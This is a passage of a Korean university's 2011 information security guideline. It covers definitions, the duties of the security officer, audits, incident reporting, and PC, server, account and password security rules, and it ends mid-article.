정보보안지침 2011. 6. 10 문경대학교 - 1 -
목 차 제 1 장개요 1 제1조 ( 목적 ) 1 제2조 ( 적용범위 ) 1 제3조 ( 용어정의 ) 1 제4조 ( 책무 ) 3 제5조 ( 정보보안담당관운영 ) 3 제6조 ( 활동계획수립및심사분석 ) 4 제7조 ( 정보보안내규제 개정 ) 4 제8조 ( 정보보안수준진단 ) 4 제9조 ( 정보보안감사 ) 4 제10조 ( 정보보안교육 ) 4 제11조 ( 사이버보안진단의날 ) 5 제12조 ( 통신보안위규 ) 5 제13조 ( 정보보안사고조사 ) 5 제14조 ( 재난방지 ) 5 제15조 ( 표준적용 ) 6 제16조 ( 정보협력 ) 6 제 2 장정보보안관리 6 제 1 절기본사항 6 제17조 ( 인적보안 ) 6 제18조 ( 정보시스템보안 ) 6 제19조 ( 정보통신시설보안 ) 7 제20조 ( 보안성검토 ) 7 제21조 ( 보안적합성검증 ) 8 제22조 ( 전자정보보안조치 ) 8 제23조 ( 전자정보보호등급분류 ) 8 제 2 절비밀의전자적관리 9 제24조 ( 비밀의전자적처리 ) 9 제25조 ( 비밀의전자적처리규격 ) 9 제26조 ( 비밀관리시스템 ) 9
제 3 절전자정보보안대책 10 제27조 (PC 등단말기보안관리 ) 10 제28조 ( 인터넷 PC 보안관리 ) 10 제29조 ( 서버보안관리 ) 11 제30조 ( 웹서버등공개서버보안관리 ) 11 제31조 ( 홈페이지게시자료보안관리 ) 11 제32조 ( 사용자계정관리 ) 12 제33조 ( 비밀번호관리 ) 12 제34조 ( 업무망보안관리 ) 13 제35조 ( 네트워크장비보안관리 ) 14 제36조 ( 전자우편보안대책 ) 14 제37조 ( 휴대용저장매체보안관리 ) 14 제38조 ( 악성코드방지대책 ) 15 제39조 ( 접근기록관리 ) 16 제40조 ( 정보시스템개발보안 ) 16 제41조 ( 정보시스템유지보수 ) 17 제42조 ( 전자정보저장매체불용처리 ) 17 제 4 절주요상황별보안대책 18 제43조 ( 전자기파보안대책 ) 18 제44조 ( 무선랜보안관리 ) 18 제45조 ( 국제통신보안관리 ) 18 제46조 ( 국제회의보안관리 ) 18 제47조 ( 무선인터넷보안관리 ) 19 제48조 (RFID 보안관리 ) 19 제49조 ( 인터넷전화보안관리 ) 20 제50조 (CCTV운용보안관리 ) 20 제51조 ( 디지털복사기보안관리 ) 20 제52조 ( 첨단정보통신기기보안관리 ) 21 제53조 ( 정보통신망자료보안관리 ) 21 제54조 ( 용역사업보안관리 ) 22 제55조 ( 정보시스템위탁운영보안관리 ) 23 제56조 ( 원격근무보안관리 ) 23 제57조 ( 국가비상사태시보호관리 ) 24-2 -
제 5 절주요통신기반시설등의보안대책 24 제58조 ( 주요정보통신기반시설보안대책 ) 24 제59조 ( 주요기반시설지정 ) 24 제60조 ( 주요기반시설취약점분석 평가보안관리 ) 25 제61조 ( 제어시스템보안관리 ) 25 제 4 장보안관제 25 제62조 ( 보안관제센터구축 ) 25 제63조 ( 정보공유 ) 26 제64조 ( 보안관제용역업체선정 ) 26 제 5 장안전성확인 26 제 1 절보안성검토 26 제65조 ( 보안성검토선정 ) 26 제66조 ( 보안성검토절차 ) 27 제67조 ( 제출문서 ) 27 제68조 ( 결과조치 ) 28 제 2 절보안적합성검증 28 제69조 ( 정보보호시스템의도입등 ) 28 제70조 ( 보안적합성검증대상및신청 ) 28 제71조 ( 결과조치 ) 29 제72조 ( 사후관리 ) 29 제73조 ( 무단변경및오용금지 ) 29 제 6 장보칙 29 제74조 ( 다른법령과의관계 ) 29 부칙 30 별표 31 별지서식 37-3 -
부 록 [ 부록 1] 정보화사업단계별보안조치사항 ( 요약 ) 49 [ 부록 2] 정보화사업보안성검토처리기준 50 [ 부록 3] 정보보안점검체크리스트 56 [ 부록 4] 정보화수준자가진단항목 63 [ 부록 5] USB메모리휴대용저장매체보안관리지침 65 [ 부록 6] 정보시스템저장매체불용처리지침 82 [ 부록 7] 외부용역업체보안관리방안 86 [ 부록 8] RFID 보안관리지침 92 [ 부록 9] 인터넷전화구축시보안준수사항 122 [ 부록 10] CCTV 보안취약점및보안대책 130 [ 부록 11] USB 보안관리강화대책 135 [ 부록 12] 메일서버운용시보안관리강화방안 139 [ 부록 13] 국가계약법시행령개정안주요내용및조치사항 143 [ 부록 14] 정보화사업보안성검토메뉴얼 155 [ 부록 15] DDOS 공격대비보안관리강화대책 183 [ 부록 16] 백신관리서버운용시보안관리강화대책 188 [ 부록 17] 신종해킹메일유형및긴급보안조치대책 199 [ 부록 18] 스마트폰도입시보안대책 203 [ 부록 19] 관리자페이지인터넷노출점검및개선조치방법 207 [ 부록 20] 주요사이버위협요소별보안강화대책 213 교육과학기술부사이버안전센터운영규정 251-4 -
제 1 장개요 제 1 조 ( 목적 ) 본지침은문경대학 ( 이하 본교 라한다 ) 개인정보보호법제 33 조 ( 개인 정보의안전성확보조치 ) 에의거하여전산정보원과기타단위부서의시설및전산장비 에대한물리적, 관리적보안을강화하는것을그목적으로한다. 제 2 조 ( 적용범위 ) 본지침은본교정보전산원과기타단위부서의전산시스템운영자를 대상으로한다. 제3조 ( 용어정의 ) 1. 사용자 라함은대학으로부터정보통신망또는정보시스템에대한접근또는사용허가를받은자를말한다. 2. 정보통신망 이라함은전기통신기본법제2조제2호의규정에의한전기통신설비를활용하거나전기통신설비와컴퓨터및컴퓨터의이용기술을활용하여정보를수집ㆍ가공ㆍ저장ㆍ검색ㆍ송수신하는정보통신체제를말하며정보시스템일체를포함한다. 정보시스템 이라함은서버ㆍPC 등단말기, 보조기억매체, 네트워크장치, 응용프로그램등정보의수집ㆍ가공ㆍ저장ㆍ검색ㆍ송수신에필요한하드웨어및소프트웨어를말한다. 4. 휴대용저장매체 라함은디스켓ㆍ CDㆍ외장형하드디스크ㆍ USB 메모리등정보를저장할수있는것으로 PC 등의정보시스템과분리할수있는기억장치를말한다. 5. 정보보안 또는 정보보호 라함은정보시스템및정보통신망을통해수집ㆍ가공ㆍ저장ㆍ검색ㆍ송수신되는정보의유출ㆍ위변조ㆍ훼손등을방지하기위하여관리적ㆍ물리적ㆍ기술적수단을강구하는일체의행위로서사이버안전을포함한다. 6. 전자문서 라함은컴퓨터등정보처리능력을가진장치에의하여전자적인형태로송ㆍ수신또는저장되는정보를말한다. 7. 전자기록물 이라함은정보처리능력을가진장치에의하여전자적인형태로송ㆍ수신또는저장되는기록정보자료를말한다. 8. 전자정보 라함은각급기관이업무와관련하여취급하는전자문서및전자기록물을말한다. 9. RFID(Radio Frequency IDentification) 시스템 이라함은대상이되는사물등에 RFID 태그를부착하고전파를사용, 해당사물등의식별정보및주변환경정보를인식하여각사물등의정보를수집ㆍ저장ㆍ가공및활용하는시스템을말한다. 10. 정보통신실 이라함은서버ㆍPC 등과스위치ㆍ교환기ㆍ라우터등네트워크장치등이설치운용되는장소를말하며, 전산실ㆍ통신실ㆍ전자문서및전자기록물 ( 전자정보 ) 보관실등을말한다. 11. 안전측정 이라함은정보통신망을불법침입ㆍ교란ㆍ마비ㆍ파괴하거나정보를절취 - 1 -
ㆍ훼손하는해킹ㆍ컴퓨터바이러스ㆍ서비스방해ㆍ도청등으로부터정보통신망과정보를보호하기위하여정보보안취약점을진단하는제반활동을말하며, 대도청 ( 對盜聽 ) 측정활동을포함한다. 12. 국가용보안시스템 이라함은비밀등중요자료보호를위하여국가정보원장이개발하거나안전성을검증한암호장비ㆍ보안자재ㆍ암호논리등을말한다. 13. 국가용보안시스템제작업체 ( 이하 제작업체 라한다 ) 라함은국가용보안시스템의제작권을획득한업체를말한다. 14. 암호장비 라함은정보통신망으로처리ㆍ저장ㆍ송수신되는정보를보호할목적으로암호논리를내장하여제작된장비를말한다. 15. 보안자재 라함은통신내용등의정보를보호할목적으로사용하는암호ㆍ음어ㆍ약호자재를말한다. 16. 암호자재 라함은 Ⅱ급비밀이하의통신내용등의정보를보호할목적으로사용하는문자ㆍ숫자ㆍ기호등으로구성된환자표와난수또는암호논리등을수록한문서나도구를말한다. 17. 음어자재 라함은 Ⅲ급비밀이하의통신내용등의정보를보호할목적으로사용하는문자ㆍ숫자ㆍ기호등으로구성된환자표또는암호논리등을수록한문서나도구를말한다. 18. 약호자재 라함은대외비이하의통신내용등의정보를보호할목적으로특정용어와그에대응ㆍ변환되는문자, 숫자, 기호등을수록한문서나도구를말한다. 19. 암호논리 라함은정보의유출, 위ㆍ변조, 훼손등을방지하기위하여기밀성ㆍ무결성ㆍ인증ㆍ부인봉쇄등의기능을제공하는수학적논리또는알고리즘을말한다. 20. 암호모듈 이라함은정보의유출, 위ㆍ변조, 훼손등을방지하기위해암호논리를활용하여구현한수단이나도구를말한다. 21. 암호취급자 라함은암호취급인가를받아암호체계를연구하거나국가용보안시스템을취급관리하는자를말한다. 22. 음어취급자 라함은음어취급인가를받아음어자재를취급관리하도록임명된자를말한다. 23. 정보보호시스템 이라함은정보의수집ㆍ저장ㆍ검색ㆍ송신ㆍ수신시정보의유출, 위ㆍ변조, 훼손등을방지하기위한하드웨어및소프트웨어를말한다. 24. 전자파보안 이라함은유ㆍ무선탐지장비등을이용하여은닉된도청장치색출등각종도청위해요소를제거하고정보통신기기ㆍ시설등을대상으로누설전자파에의한정보유출방지및고출력전자기파침해위협으로부터정보를보호하는활동을말한다. 25. 고출력전자기파 (EMP) 라함은전자장비를물리적으로파괴시킬정도의강력한전자기적충격파를말한다. 26. 누설전자파 (TEMPEST) 라함은 PC 등정보통신기기로부터전도혹은방사되는전자파신호로서원격지에서수신하여원래화면내용을복원할수있는정보를포함한다. - 2 -
27. 사이버공격 이라함은해킹, 컴퓨터바이러스, 논리폭탄, 메일폭탄, 서비스방해등 전자적수단에의하여정보통신망을불법침입ㆍ교란ㆍ마비ㆍ파괴하거나정보를절취 ㆍ훼손하는공격행위를말한다. 제 4 조 ( 책무 ) 대학은대학의관련정보 ( 전자정보를포함한다. 이하같다 ) 와정보통신망을보 호하기위한보안대책을마련하여야하며정보보안에대한책임을진다. 제5조 ( 정보보안담당관운영 ) 1 대학은효율적ㆍ체계적인정보보안업무를수행하기위하여정보보안전문지식을보유한인력을확보하고관련전담조직을구성운영하여야한다. 2 대학은제1항과관련한정보보안조직을지휘하고소속및산하기관에대한정보보안업무를총괄하기위하여 정보보안담당관 을임명하여야한다. 3 정보보안담당관을임면한경우에는 7일이내에소속ㆍ직책ㆍ직급ㆍ성명ㆍ연락처 ( 전자우편주소포함 ) 등을지도감독기관의장에게통보하여야한다. 4 대학이정보보안담당관에부여하는기본활동은다음각호와같다. 1. 정보보안정책및기본계획수립ㆍ시행 2. 정보보안관련규정ㆍ지침등제ㆍ개정 3. 보안심사위원회에정보보안분야안건심의주관 4. 정보보안업무지도ㆍ감독, 정보보안감사및심사분석 5. 정보통신실, 정보통신망및정보자료등의보안관리 6. 정보보안관리실태평가 7. 사이버공격초동조치및대응 8. 사이버위협정보수집ㆍ분석및보안관제 9. 정보보안예산및전문인력확보 10. 정보보안사고조사결과처리 11. 정보보안교육및정보협력 12. 도청위해요소측정ㆍ제거 13. 주요정보통신기반시설보호활동 14. 국가용보안시스템및암호키의운용ㆍ보안관리 15. 국가정보원장이개발하거나안전성을검증한암호모듈ㆍ정보보호시스템의운용및보안관리 16. 정보통신망보안대책의수립ㆍ시행 17. 사이버보안진단의날 계획수립ㆍ시행 18. 그밖에정보보안관련사항제6조 ( 활동계획수립및심사분석 ) 1 대학은해당기관의정보보안업무세부추진계획 ( 교육과학기술부사이버안전센터운영규정 제 8조에따른사이버안전대책을포함한다 ) 을수립ㆍ시행하고그추진결과를심사분석ㆍ평가하여야한다. - 3 -
2제1항의경우대학은세부추진계획및심사분석을별지제1호및별지제2호서식에따라작성, 연도보안업무수행목표및중점추진방향 에서규정한기한까지완료하여보관한다. 1. 보안업무추진계획 : 1.25까지 2. 보안업무심사분석 : 7.31까지 ( 전년도 3/4분기 해당연도 2/4분기내용종합 ) 제7조 ( 정보보안내규제ㆍ개정 ) 1 대학보및정보통신망보호를위한자체정보보안내규 ( 지침ㆍ시행세칙등 ) 를작성운용할수있다. 2 대학은교육과학기술부정보보안기본지침제11조 2항을준용하여교육과학기술부장관과협의한다. 제8조 ( 정보보호수준진단 ) 1 대학은 전자정부법 제 56조및같은법시행령제69조ㆍ제 70조, 공공기록물관리에관한법률시행령 제 5조등의규정에의한보안대책의수립 시행등을교육과학기술부장관이매년정하는진단대상ㆍ기준, 진단항목및기간에따라자체진단하고그결과를교육과학기술부장관에게통보하여야한다. 2 교육과학기술부장관은제1항의규정에의한자체진단결과에대한객관성확보를위하여해당기관을방문하여진단결과를검증할수있다. 3 교육과학기술부장관은제1항의규정에의한자체진단결과를종합분석하여그결과를관계기관에배포할수있다. 4 제3항의규정에따라교육과학기술부장관이결과를배포할경우최종결과에보안관리체계개선방안을포함하여야하며필요한경우전문인력자문또는기술제공등을지원할수있다. 제9조 ( 정보보안감사 ) 1 대학은연1회이상자체정보보안감사를실시하여야한다. 2 대학은제6조에따른정보보안업무세부추진계획및심사분석결과제출시정보보안감사실시계획과감사결과를포함하여야한다. 3 대학은정보보안감사의효율적수행을위하여교육과학기술부장관에게감사방향, 감사중점사항, 감사관지원등업무협조를요청할수있다. 제10조 ( 정보보안교육 ) 1 대학은자체정보보안교육계획을수립하여연 1회이상전직원을대상으로관련교육을실시하여야한다. 2 대학은정보보안교육의효율성제고를위해기관별자체실정에맞는정보보안교안을작성활용하여야하며필요시교육과학기술부장관에게전문인력및자료지원을요청할수있다. 3 대학은정보보안관련전문기관교육및기술세미나참석을장려하는등정보보안담당자의업무전문성을제고하기위하여노력하여야한다. - 4 -
제11조 ( 사이버보안진단의날 ) 1 대학은당해기관실정에맞게매월세번째수요일을 사이버보안진단의날 로지정ㆍ운영하여야한다. 2 정보보안담당관은 사이버보안진단의날 에소관정보보안업무전반에대하여체계적이고종합적인보안진단을실시하여야한다. 제12조 ( 통신보안위규 ) 1 통신망을통해비인가자에게누설하거나위반할경우발생하는통신보안위규사항은별표 1과같다. 2 대학은국가안보및국가이익에중대한영향을미칠수있다고판단되는통신보안위규에대해서는가장신속한방법으로교육과학기술부장관에게통보하여야한다. 3 대학은제2항의경우통신보안위규자, 위규내용및조치사항을교육과학기술부장관에게통보하여야한다. 제13조 ( 정보보안사고조사 ) 1 대학은별표 2의정보보안사고가발생한때에는즉시피해확산방지를위한조치를취하고다음각호의사항을교육과학기술부장관에게통보하여야한다. 이경우, 사고원인규명시까지피해시스템에대한증거를보전하고임의로관련자료를삭제하거나포맷하여서는아니된다. 1. 일시및장소 2. 사고원인, 피해현황등개요 3. 사고자및관계자의인적사항 4. 조치내용등 2 교육과학기술부장관은보안사고조사결과를해당기관의장에게통보하고동일유형의사고가발생하지않도록제반보안조치를해당기관에권고할수있다. 3 교육과학기술부장관은제2항에도불구하고, 필요하다고인정할경우대학에게사고조사에관한권한의일부를위임할수있다. 다만, 권한을위임받은대학은교육과학기술부장관에게조사결과를통보해야한다. 4 교육과학기술부장관은사고조사결과피해가심각하다고판단되는경우대학과협의하여사고대책본부를구성ㆍ운영할수있다. 5 대학은규정에의한관련자징계, 재발방지를위한보안대책의수립ㆍ시행등사고조사결과에따라필요한조치를이행하고결과를교육과학기술부장관에게제출하여야한다. 제14조 ( 재난방지 ) 1 대학은인위적또는자연적인원인으로인한정보통신망의장애발생에대비하여정보시스템이원화, 백업관리, 복구등종합적인재난방지대책을수립 시행하여야한다. 2 대학은재난방지대책을정기적으로시험하고검토해야하며업무연속성에대한영향 - 5 -
평가를실시하여야한다. 3 대학은정보시스템장애에대비한백업시설을확보하고정기적으로백업을수행하여야한다. 4 대학은제3항에의거백업시설을설치할경우에는정보통신실과물리적으로일정거리이상위치한안전한장소에설치하여야하며전력공급원분리등정보시스템의가용성을최대화할수있도록하여야한다. 제 15 조 ( 표준적용 ) 대학은정보보안대책을강구하는경우정보보안에필요한기술의호환성유지 및안전성확보를위하여국가정보원장이제정한 국가표준기본법 의표준을우선적용하 여야한다. 제 16 조 ( 정보협력 ) 대학은정보보안업무의발전을도모하고상호교류협력을증진하기위하 여협의기구를구성ㆍ운영할수있다. 제 2 장정보보안관리 제 1 절기본사항 제17조 ( 인적보안 ) 1 대학은소관정보통신망 ( 정보시스템포함 ) 사용과관련하여사용자의직위ㆍ임무별정보통신망접근자격부여심사등인적보안에관한절차및방법을마련하여야한다. 2 대학은정보통신망을통하여비밀등중요정보를취급하는사용자에대해서는비밀취급인가, 보안서약서징구등의보안조치를하여야한다. 3 대학은사용자가보직변경, 퇴직등인사이동이있을경우관련정보시스템접근권한을조정하여야한다. 4 대학은외부인력을활용하여정보시스템의개발, 운용, 정비등을수행할경우에는해당인력의고의또는실수로인한정보유출이나파괴를방지하기위하여보안조치를수행하여야한다. 용역사업에관한세부사항은용역사업자등보안관리, 제57조 ( 용역사업보안관리 ) 또는 외부용역업체보안관리방안 ( 부록 7) 을따른다. 제18조 ( 정보시스템보안 ) 1 대학은당해기관에필요한일체의정보시스템 (PCㆍ서버ㆍ네트워크장비등포함 ) 을도입ㆍ사용할경우, 사용자ㆍ시스템관리자및관리책임자를지정운용하여야한다. 2 사용자는개인PC 등소관정보시스템을사용하거나본인계정으로정보통신망에접속하는것과관련한보안책임을가진다. - 6 -
3 시스템관리자는서버ㆍ네트워크장비등부서공통으로사용하는정보시스템의운용과관련한보안책임을가진다. 4 제1항내지제3항과관련하여정보시스템을실제운용하는부서의장이정보시스템 관리책임자 가되며, 관리책임자는정보시스템관리대장 ( 별지제4호서식 ) 을수기또는전자적으로운용관리하여야한다. 5 관리책임자는해당부서의정보시스템관리대장에정보시스템의변경최종현황을유지및관리하여야한다. 6 정보보안담당관은제1항내지제5항에명시된정보시스템운용과관련한보안취약점을발견하거나보안대책강구가필요하다고판단할경우, 사용자ㆍ시스템관리자및관리책임자에게시정을요구할수있다. 제19조 ( 정보통신시설보안 ) 1 대학은다음각호의중요정보통신시설및장소를 보안업무규정 ( 대통령령 ) 제30 조에따른보호구역으로설정관리하여야한다. 1. 통신실 2. 정보통신실 3. 국가용보안시스템개발ㆍ설치장소 4. 중요통신망의교환국, 회선집중국또는중계국 5. 보안관제센터, 백업센터및중요한정보통신시설을집중제어하는국소 6. 그밖에보안관리가필요하다고인정되는정보시스템설치장소 2 대학은제1항에서지정된보호구역에대한보안대책을강구할경우다음각호사항을참고하여야한다. 1. 방재대책및외부로부터의위해 ( 危害 ) 방지대책 2. 상시이용하는출입문은한곳으로정하고이중잠금장치설치 3. 출입자인증ㆍ식별등을위한출입문보안장치설치및주야간감시대책 4. 휴대용저장매체를보관할수있는용기비치 5. 정보시스템안전지출및긴급파기계획수립 6. 관리책임자및자료ㆍ장비별취급자지정운용 7. 정전에대비한비상전원공급, 시스템의안정적중단등전력관리대책 8. 비상조명장치등비상탈출대책 9. 전자파누설방지대책 10. 카메라장착휴대폰등을이용한불법촬영방지대책등 제20조 ( 보안성검토 ) 1 대학은정보통신망의신ㆍ증설등에대하여보안대책을강구하고적절성확인을위하여사업계획단계에서 ( 사업공고전 ) 보안담당관을경유하여보안심사위원회에보안성검토를의뢰하여야한다. 사전협의를통해정보시스템단순교체등사안이경미하다고판단하는경우에는보안성검토를생략할수있다. - 7 -
2 보안성검토의대상, 절차, 제출자료목록, 보안대책에포함해야할사항등구체적인 내용은제 5 장제 1 절보안성검토및제 2 절보안적합성검증에따른다. 제 21 조 ( 보안적합성검증 ) 대학은국가용보안시스템을제외한정보보호시스템을도입할경 우, 제 5 장제 2 절보안적합성검증에따라제품을선정하고안전성확인을위해보안심사위원회 에보안적합성검증을의뢰하여야한다. 제22조 ( 전자정보보안조치 ) 1 대학은정보통신망을통하여보관ㆍ유통되는전자정보의보안을위하여다음각호의조치를이행하여야한다. 1. 제5조제4항에명시된정보보안기본활동수행 2. 제29조내지제45조에의한전자정보보안대책이행 3. 국가정보보안기본지침 제5장의규정에따른국가용보안시스템의사용 4. 제6장제2절의규정에의한정보보호시스템의도입운용 5. 정보통신망보안대책의수립ㆍ시행 6. 국가정보원장이발행한지침ㆍ매뉴얼및각종권고사항의이행 7. 교육과학기술부장관이발행한지침ㆍ매뉴얼및각종권고사항의이행 8. 그밖에전자정보보안을위하여필요하다고인정되는보안대책의이행 제23조 ( 전자정보보호등급분류 ) 1 대학은비밀이아닌중요전자정보의효율적보호를위하여다음각호에해당하는전자정보에대하여자체실정에맞는보호등급으로분류하여야한다. 1. 최초로정보통신망을신설하여전자정보의보호등급구분이필요한경우 2. 현재운용중인정보통신망을재구성할경우 3. 대학이필요하다고인정하는경우 2 제1항의규정에의한전자정보의보호등급분류는다음각호와같이구분한다. 1. 가 급유출또는손상되는경우각급기관의업무수행에중대한장애를초래하거나개인신상에심각한영향을줄수있는전자정보 2. 나 급유출또는손상되는경우대학의업무수행에장애를초래하거나개인신상에영향을줄수있는전자정보 3. 다 급유출또는손상되는경우대학의업무수행및기관의이미지에경미한영향을줄수있는전자정보 3 대학은제2항의규정에따라전자정보보호등급을분류하기위한자체기준을수립하여야한다. - 8 -
제 2 절비밀의전자적관리 제24조 ( 비밀의전자적처리 ) 1 대학은비밀등중요전자정보를정보통신망을이용하여생산ㆍ보관ㆍ분류ㆍ열람ㆍ출력ㆍ송수신ㆍ이관하는등전자적으로처리하기위해서는국가용보안시스템을사용하여암호화하는등안전성을확인한보안조치를수행하여야한다. 2 제1항의경우, 업무망이인터넷망과분리된경우업무망전용 PC에서비밀등중요전자정보를처리하고미분리된경우에는여타전산망과연동되지않은비밀문서작업전용 PC에서처리한다. 3 비밀을전자적으로생산하고자할때에는해당비밀등급과예고문을입력하여열람또는출력시비밀등급이자동으로표시되도록하여야한다. 4 비밀을전자적으로생산ㆍ열람ㆍ출력ㆍ송수신ㆍ이관시에는관련규격에의거, 제반사항을전자적으로기록유지하여야하며송수신시에는정당성확인및부인을방지하기위하여전자적으로생성된영수증을사용하여야한다. 5 비밀생산을완료한경우에는 PC에입력된비밀내용을삭제하여야한다. 다만, 업무상계속보관이필요한경우에는비밀저장용휴대용저장매체를별도로지정사용하거나 PC내에독립된폴더를지정, 국가용보안시스템으로암호화하여보관하여야한다. 6 제1항부터제5항에명시된국가용보안시스템과관련한세부사항은 국가정보보안기본지침 제5장국가용보안시스템에따른다. 8 전자적으로처리된비밀을종이문서로출력한이후의취급관리는 보안업무규정 ( 대통령령 ) 에따른다. 제25조 ( 비밀의전자적처리규격 ) 대학은비밀을전자적으로안전하게처리하기위하여다음각호의사항을포함하여별도로규정한보안규격을준수하여야한다. 1. 비밀의생산, 등록, 보관, 사용, 유통및재분류, 이관, 파기등전처리과정에서요구되는보안기능 2. 비밀의관리를위한기능 3. 비밀을표시하기위한양식및외형정의 4. 비밀을전자적으로처리하면서발생하는각종이벤트기록 관리기능 5. 비밀을관리하기위한각종대장및카드정의 6. 사용자및시스템관리기능 7. 그밖에비밀을전자적으로처리하는데필요한보안ㆍ관리기능 제 26 조 ( 비밀관리시스템 ) 1 대학이비밀관리시스템을자체개발하여운용하고자하는경우에 는제 27 조의규정에따라국가정보원장이별도로정한규격을준수하여야한다. - 9 -
2 비밀관리시스템을구축한경우에는비밀의생산, 보관, 유통등전반에비밀관리시스템을활용하여비밀을안전하게관리하여야한다. 4 대학은비밀관리시스템을국가용보안시스템으로관리하여야하며, 비밀관리시스템의안전한운영관리를위해필요한사항을정할수있다. 제 3 절전자정보보안대책 제27조 (PC 등단말기보안관리 ) 1 단말기사용자는 PCㆍ노트북ㆍ PDA 등단말기 ( 이하 PC 등 ) 사용과관련한일체의보안관리책임을가진다. 2 정보보안담당관은비인가자가 PC 등을무단으로조작하여전산자료를절취, 위ㆍ변조및훼손시키지못하도록다음각호의보안대책을단말기사용자에게지원하며, 사용자는이를준수하여야한다. 1. 장비 (CMOS 비밀번호 ) ㆍ자료 ( 중요문서자료암호화비밀번호 ) ㆍ사용자 ( 로그온비밀번호 ) 별비밀번호를주기적으로변경사용하고지문인식등생체인식기술적용권고 2. 10분이상 PC 작업중단시비밀번호가적용된화면보호조치 3. PC용최신백신운용ㆍ점검, 침입차단ㆍ탐지시스템등을운용하고운영체제 (OS) 및응용프로그램 ( 한컴오피스, MS Office, Acrobat 등 ) 의최신보안패치유지 4. 업무상불필요한응용프로그램설치금지및공유폴더의삭제 5. 그밖에안전성을확인하여배포승인한프로그램의운용및보안권고문 3 사용자는 PC 등단말기를교체ㆍ반납ㆍ폐기하거나고장으로외부에수리를의뢰하고자할경우에는관리책임자와협의하여하드디스크에수록된자료가유출, 훼손되지않도록보안조치하여야한다. 4 관리책임자는사용자가 PC 등을기관외부로반출하거나내부로반입할경우에최신백신등을활용하여해킹프로그램및웜ㆍ바이러스감염여부를점검하여야한다. 5 개인소유의 PC 등단말기를무단반입하여사용하여서는아니된다. 다만, 부득이한경우에는관리책임자의승인을받아사용할수있다. 제28조 ( 인터넷PC 보안관리 ) 1 정보보안담당관은인터넷과연결된 PC( 이하인터넷PC) 를비인가자가무단으로조작하여전산자료를절취, 위ㆍ변조및훼손시키지못하도록다음각호의보안대책을사용자에게지원하며, 사용자는이를준수하여야한다. 1. 메신저ㆍP2P ㆍ웹하드등업무에무관하거나불필요한 Active-X 등보안에취약한프로그램과비인가프로그램ㆍ장치의설치금지 2. 특별한사유가없는한문서프로그램은읽기전용으로운용 ( 단, 업무망과인터넷망이분리된경우 ) 3. 음란ㆍ도박ㆍ증권등업무와무관한사이트접근차단조치 - 10 -
2 그밖에인터넷 PC 의보안관리에관련한사항에대해서는제 27 조 (PC 등단말기보안대책 ) 를따른다. 제29조 ( 서버보안관리 ) 1 서버관리자는서버를도입ㆍ운용할경우, 정보보안담당관과협의하여해킹에의한자료절취, 위ㆍ변조등에대비한보안대책을수립ㆍ시행하여야한다. 2 서버관리자는서버내저장자료에대해업무별ㆍ자료별중요도에따라사용자의접근권한을차등부여하여야한다. 3 서버관리자는사용자별자료의접근범위를서버에등록하여인가여부를식별토록하고인가된범위이외의자료접근을통제하여야한다. 4 서버관리자는서버의운용에필요한서비스포트외에불필요한서비스포트를제거하며관리용서비스와사용자용서비스를분리운용하여야한다. 5 서버관리자는서버의관리용서비스접속시특정 IP와 MAC 주소가부여된관리용단말을지정운용하여야한다. 6 서버관리자는서버설정정보및서버에저장된자료에대해서는정기적으로백업을실시하여복구및침해행위에대비하여야한다. 7 서버관리자는데이터베이스에대하여사용자의직접적인접속을차단하고개인정보등중요정보를암호화하는등데이터베이스별보안조치를실시하여야한다. 8 정보보안담당관은제1항내지제7항에서수립한보안대책의적절성을수시확인하되, 연1 회이상보안도구를이용하여서버설정정보및저장자료의절취, 위ㆍ변조가능성등보안취약점을점검하여야한다. 제30조 ( 웹서버등공개서버보안관리 ) 1 서버관리자는외부인에게공개할목적으로설치되는웹서버등공개서버를내부망과분리된영역 (DMZ) 에설치ㆍ운용하여야한다. 2 대학은비인가자의서버저장자료절취, 위ㆍ변조및분산서비스거부 (DDoS) 공격등에대비하기위하여국가정보원장이안전성을검증한침입차단ㆍ탐지시스템및 DDoS 대응시스템을설치하는등보안대책을강구하여야한다. 3 서버관리자는비인가자의공개서버내에비공개정보에대한무단접근을방지하기위하여서버에접근사용자를제한하고불필요한계정을삭제하여야한다. 4 공개서버의서비스에필요한프로그램을개발하고시험하기위해사용된도구 ( 컴파일러등 ) 는개발완료후삭제를원칙으로한다. 5 공개서버의보안관리에관련한그밖에사항에대해서는제29 조 ( 서버보안관리 ) 에따른다. 제31조 ( 홈페이지게시자료보안관리 ) 1 대학은개인정보를포함한중요업무자료가홈페이지에무단게시되지않도록홈페이지게시자료의범위ㆍ방법등을명시한자체홈페이지정보공개보안지침을수립시행하여야한다. 2 사용자는개인정보, 비공개공문서및민감자료가포함된문서를홈페이지에공개하여 - 11 -
서는아니된다. 3 홈페이지에정보를게시하고자하는부서의장은정보화담당관과협의하여사전에보안심사위원회의심사를거쳐비밀등비공개자료가게시되지않도록하여야한다. 다만, 기존에게시한내용중단순하게수치를변경하거나경미한사항은그러하지아니할수있다. 4 사용자는인터넷블로그ㆍ카페ㆍ게시판ㆍ개인홈페이지또는소셜네트워크서비스등일반에공개된전산망에업무관련자료를무단게재하여서는아니된다. 5 정보보안담당관은홈페이지등에비공개내용이게시되었는지여부를주기적으로확인하고개인정보를포함한중요정보가홈페이지에공개되지않도록보안교육을주기적으로실시하여야한다. 6 대학은홈페이지에중요정보가공개된것을인지할경우이를즉시차단하는등의보안조치를강구시행하여야한다. 제32조 ( 사용자계정관리 ) 1 시스템관리자는사용자에게정보시스템접속에필요한사용자계정 (ID) 부여시비인가자도용및정보통신시스템불법접속에대비하여다음각호의사항을반영하여야한다. 1. 사용자별또는그룹별로접근권한부여 2. 외부인에게계정부여는불허하되업무상불가피시대학책임하에필요업무에한해특정기간동안접속토록하는등보안조치강구후허용 3. 비밀번호등사용자식별및인증수단이없는사용자계정사용금지 2 시스템관리자는사용자가 5회이상에걸쳐로그인실패시정보시스템접속을중단시키도록시스템을설정하고비인가자의침입여부를확인점검하여야한다. 3 시스템관리자는교 직원의퇴직또는보직변경발생시사용하지않는사용자계정을신속히삭제하고, 특별한사안이없는한유지보수등을위한외부업체직원에게관리자계정제공을금지하여야한다. 4 정보보안담당관은사용자계정의부여및관리가적절한지연2회이상점검하여관련결과를시스템관리자에게통보하여야한다. 제33조 ( 비밀번호관리 ) 1 사용자는비밀번호설정사용시정보시스템의무단사용방지를위하여다음과같이구분하여야한다. 1. 비인가자의정보통신시스템접근방지를위한장비접근용비밀번호 (1차) 2. 정보시스템사용자가서버등정보통신망에접속인가된인원인지여부를확인하는사용자인증비밀번호 (2차) 3. 문서에대한열람ㆍ수정및출력등사용권한을제한할수있는자료별비밀번호 (3차) 2 비밀이나중요자료에는자료별비밀번호를반드시부여하되, 